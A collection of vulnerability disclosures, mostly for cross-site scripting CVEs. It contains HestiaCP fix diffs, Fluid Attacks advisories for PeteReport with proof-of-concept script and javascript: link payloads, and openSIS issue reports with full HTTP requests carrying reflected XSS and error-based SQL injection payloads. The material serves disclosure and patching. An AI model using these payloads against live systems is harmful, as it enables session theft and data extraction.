Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.5.10.

@@ -141,7 +141,7 @@ generate\_mail\_credentials = function() { var div \= $('.mail-infoblock').clone(); div.find('#mail\_configuration').remove(); var pass\=div.find('#v\_password').text(); if (pass\=="") div.find('#v\_password').html(' '); if (pass\=="") div.find('#v\_password').text(' '); var output \= div.text(); output\=output.replace(/(?:\\r\\n|\\r|\\n|\\t)/g, "|"); output\=output.replace(/ /g, ""); @@ -188,29 +188,29 @@ $(document).ready(function() {  
switch(opt.attr('v\_type')){ case 'hostname': $('#td\_imap\_hostname').html(opt.attr('domain')); $('#td\_smtp\_hostname').html(opt.attr('domain')); $('#td\_imap\_hostname').text(opt.attr('domain')); $('#td\_smtp\_hostname').text(opt.attr('domain')); break; case 'starttls': $('#td\_imap\_port').html('143'); $('#td\_imap\_encryption').html('STARTTLS'); $('#td\_smtp\_port').html('587'); $('#td\_smtp\_encryption').html('STARTTLS'); $('#td\_imap\_port').text('143'); $('#td\_imap\_encryption').text('STARTTLS'); $('#td\_smtp\_port').text('587'); $('#td\_smtp\_encryption').text('STARTTLS'); break; case 'ssl': $('#td\_imap\_port').html('993'); $('#td\_imap\_encryption').html('SSL / TLS'); $('#td\_smtp\_port').html('465'); $('#td\_smtp\_encryption').html('SSL / TLS'); $('#td\_imap\_port').text('993'); $('#td\_imap\_encryption').text('SSL / TLS'); $('#td\_smtp\_port').text('465'); $('#td\_smtp\_encryption').text('SSL / TLS'); break; case 'no\_encryption': $('#td\_imap\_hostname').html(opt.attr('domain')); $('#td\_smtp\_hostname').html(opt.attr('domain')); $('#td\_imap\_hostname').text(opt.attr('domain')); $('#td\_smtp\_hostname').text(opt.attr('domain'));  
$('#td\_imap\_port').html('143'); $('#td\_imap\_encryption').html(opt.attr('no\_encryption')); $('#td\_smtp\_port').html('25'); $('#td\_smtp\_encryption').html(opt.attr('no\_encryption')); $('#td\_imap\_port').text('143'); $('#td\_imap\_encryption').text(opt.attr('no\_encryption')); $('#td\_smtp\_port').text('25'); $('#td\_smtp\_encryption').text(opt.attr('no\_encryption')); break; } generate\_mail\_credentials();

CVE-2022-0838: replace html() with text · hestiacp/hestiacp@640f822

PeteReport Version 0.5 allows an authenticated admin user to inject persistent JavaScript code inside the markdown descriptions while creating a product, report or finding.

**Summary**

**Name**

PeTeReport 0.5 - Stored XSS (Markdown)

**Code name**

Armstrong

**Product**

PeTeReport

**Affected versions**

Version 0.5

**Fixed versions**

Version 0.7

**State**

Public

**Release date**

2022-02-23

**Vulnerability**

**Kind**

Stored cross-site scripting (XSS)

**Rule**

010\. Stored cross-site scripting (XSS)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

**CVSSv3 Base Score**

4.8

**Exploit available**

No

**CVE ID(s)**

CVE-2022-25220

**Description**

PeteReport **Version 0.5** allows an authenticated admin user to inject persistent javascript code inside the markdown descriptions while creating a product, report or finding.

**Proof of Concept**

Steps to reproduce

1.  Click on 'Add Product'.
    
2.  Insert the following PoC inside the product description.
    
           [XSS](javascript:alert(1))
        
    
3.  Click on 'Save Product'.
    
4.  If a user visits the product and click on the link in the description the javascript code will be rendered.
    

System Information

*   Version: PeteReport Version 0.5.
*   Operating System: Docker.
*   Web Server: nginx.

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

An updated version of PeteReport is available at the vendor page.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of `Fluid Attacks`.

**References**

**Vendor page**

https://github.com/1modm/petereport

**Issue**

https://github.com/1modm/petereport/issues/35

**Timeline**

*   2022-02-08: Vulnerability discovered.
    
*   2022-02-08: Vendor contacted.
    
*   2022-02-09: Vendor replied acknowledging the report.
    
*   2022-02-09: Vulnerability patched.
    
*   2022-02-23: Public Disclosure.

CVE-2022-25220: PeTeReport 0.5 - Stored XSS (Markdown) | Fluid Attacks

PeteReport Version 0.5 allows an authenticated admin user to inject persistent JavaScript code while adding an 'Attack Tree' by modifying the 'svg_file' parameter.

Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5.

We will assign the cve id CVE-2022-23051 to this issue but the information will be released after the vulnerability is patched. Attached below are the links to our responsible disclosure policy.

*   https://fluidattacks.com/advisories/policy

**Bug description**

PeteReport **Version 0.5** allows an authenticated admin user to inject persistent javascript code while adding an 'Attack Tree' by modifying the svg\_file parameter.

**CVSSv3 Vector:**

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

**CVSSv3 Base Score:**

4.8

**Steps to reproduce**

1.  Create a new Report.
2.  Create a new Finding for the Report.
3.  Go to 'Reports' > 'All Reports'.
4.  Click on 'View' in the last created record.
5.  Go to 'Attack Trees'.
6.  Click on 'Add Attack Tree'.
7.  Select your Finding and click on 'Save and Finish'
8.  Intercept the request and insert javascript code inside the svg\_file parameter.

   <script type\="text/javascript"\>
      alert("XSS");
   </script\>

9.  If a user visits the attack tree the javascript code will be rendered.

**Screenshots and files**

![xss_attack_tree](https://user-images.githubusercontent.com/17485471/153053130-f07789ea-18e5-4c88-81b7-5a2084bc2adb.gif)

![xss](https://user-images.githubusercontent.com/17485471/153053145-c33726de-b234-4a7e-9d2b-8f014de4be3a.png)

**System Information**

*   Version: PeteReport Version 0.5.
*   Operating System: Docker.
*   Web Server: nginx.

CVE-2022-23051: Security Issue - Stored XSS (Attack Tree) · Issue #36 · 1modm/petereport

A cross-site-scripting (XSS) vulnerability was discovered in the Data Preview Pane (previously known as Index Pattern Preview Pane) which could allow arbitrary JavaScript to be executed in a victim’s browser.

CVE-2022-23710

Axelor Open Suite v5.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Name parameter.

CVE-2022-25138

Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.5.9.

@@ -5,7 +5,7 @@

  

// Delete as someone else?

if (($\_SESSION\['userContext'\] === 'admin') && (!empty($\_GET\['user'\]))) {

$user\=$\_GET\['user'\];

$user\=scapeshellarg($user);

**This comment has been minimized.**

Sign in to view

Copy link

![@TriggerLab](https://avatars.githubusercontent.com/u/2960051?s=60&v=4)

****TriggerLab** Feb 22, 2022**

mistake commit :)

**This comment has been minimized.**

Sign in to view

Copy link

![@jaapmarcus](https://avatars.githubusercontent.com/u/9754650?s=60&u=3501043adb418c67fcdb80eaa134b82d91391d95&v=4)

****jaapmarcus** Feb 22, 2022**

Author Member

Resolved in staging branch

}

  

// Check token

@@ -15,10 +15,13 @@

if ((!empty($\_GET\['domain'\])) && (empty($\_GET\['account'\]))) {

$v\_username = escapeshellarg($user);

$v\_domain = escapeshellarg($\_GET\['domain'\]);

exec(HESTIA\_CMD."v-delete-mail-domain ".$v\_username." ".$v\_domain, $output, $return\_var);

exec(HESTIA\_CMD."v-delete-mail-domain ".$user." ".$v\_domain, $output, $return\_var);

check\_return\_code($return\_var, $output);

unset($output);

$back = $\_SESSION\['back'\];

if($return\_var > 0){

header("Location: /list/mail/");

}

if (!empty($back)) {

header("Location: ".$back);

exit;

@@ -29,19 +32,22 @@

  

// Mail account

if ((!empty($\_GET\['domain'\])) && (!empty($\_GET\['account'\]))) {

$v\_username = escapeshellarg($user);

$v\_domain = escapeshellarg($\_GET\['domain'\]);

$v\_account = escapeshellarg($\_GET\['account'\]);

exec(HESTIA\_CMD."v-delete-mail-account ".$v\_username." ".$v\_domain." ".$v\_account, $output, $return\_var);

exec(HESTIA\_CMD."v-delete-mail-account ".$user." ".$v\_domain." ".$v\_account, $output, $return\_var);

check\_return\_code($return\_var, $output);

unset($output);

if($return\_var > 0){

header("Location: /list/mail/");

}else{

$back = $\_SESSION\['back'\];

if (!empty($back)) {

header("Location: ".$back);

exit;

}

header("Location: /list/mail/?domain=".$\_GET\['domain'\]);

exit;

}

}

  

$back = $\_SESSION\['back'\];

CVE-2022-0753: Fix XXS issues (#2432) · hestiacp/hestiacp@ee10e22

OS4ED openSIS 8.0 is affected by cross-site scripting (XSS) in EmailCheckOthers.php. An attacker can inject JavaScript code to get the user's cookie and take over the working session of user.

**Description**

By injecting Javascript code, an attacker can steal the user's cookie and take over the user's account. This happened because of the lack of security implementation for`type` parameter. This was tested on demo website

**Exploitation**

![Screenshot from 2021-09-05 14-06-22](https://user-images.githubusercontent.com/35491855/132122706-da7fec3a-2b7b-433b-b059-a25f7cf604ae.jpg)

**Injection point:**  
`HTTP://demo/EmailCheckOthers.php?opt=<script>alert(1)</script>&email=asfasf`  
**Request:**

GET /EmailCheckOthers.php?opt=%3Cscript%3Ealert(1)%3C/script%3E&email=asfasf HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

**Response:**

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 09:57:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

**Solution:**

Before using any user's input, make sure to verify and sanitize it properly, trust nothing that's sent from the client. In the case of XSS, please consider using `htmlentities()` function to encode the user's input before printing it out to the user's screen

CVE-2021-40637: Reflected XSS in EmailCheckOthers.php · Issue #199 · OS4ED/openSIS-Classic

OS4ED openSIS 8.0 is affected by SQL Injection in CheckDuplicateName.php, which can extract information from the database.

**Description**

Due to lack of protection, parameters `table_name`, `field_name`, `id`, `field_id` can be abused to injection SQL queries to extract information from databases some other SQLi tricks, parameter `msg` can be used to inject XSS payload and steal user's cookie (and even takeover user's account)  
![Screenshot from 2021-09-05 14-45-56(1)](https://user-images.githubusercontent.com/35491855/132119553-61eec465-0e9f-4276-bd86-aa278de2338d.jpg)

As we can see, no security mechanism was implemented which resulted in a lot of vulnerabilities.

**Exploiting**

![Screenshot from 2021-09-05 14-51-24](https://user-images.githubusercontent.com/35491855/132120089-1ba16847-7260-4872-ad53-c8d6c7c39901.jpg)

**Injection point**:  
`HTTP://demo/CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg=`

In beneath, I've presented how information can be extracted via SQL injection. XSS can be exploited by giving the correct information in other parameters and inject Javascript code in `field_name`, `msg`.

**Request:**

GET /CheckDuplicateName.php?table\_name=api\_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field\_name=&val=&field\_id=&msg= HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

**Response:**

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 07:59:18 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 716
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/htmlx

**Solution**

Add security functions such as `sqlSecurityFilter` to sanitize parameters before processing or printing out to the screen. For XSS, use `htmlentities` to properly encode the output.

CVE-2021-40636: XSS and Error based SQL injection in CheckDuplicateName.php · Issue #198 · OS4ED/openSIS-Classic

In Genixcms v1.1.11, a stored Cross-Site Scripting (XSS) vulnerability exists in /gxadmin/index.php?page=themes&view=options" via the intro_title and intro_image parameters.

**Welcome to GeniXCMS 1.1.11**

Create magnificent Website with GeniXCMS.

Download

CVE-2022-24563: Opensource Content Management System - GeniXCMS

A stored cross-site scripting (XSS) vulnerability in the admin interface in Element-IT HTTP Commander 7.0.0 allows unauthenticated users to get admin access by injecting a malicious script in the User-Agent field.

Tag

#xss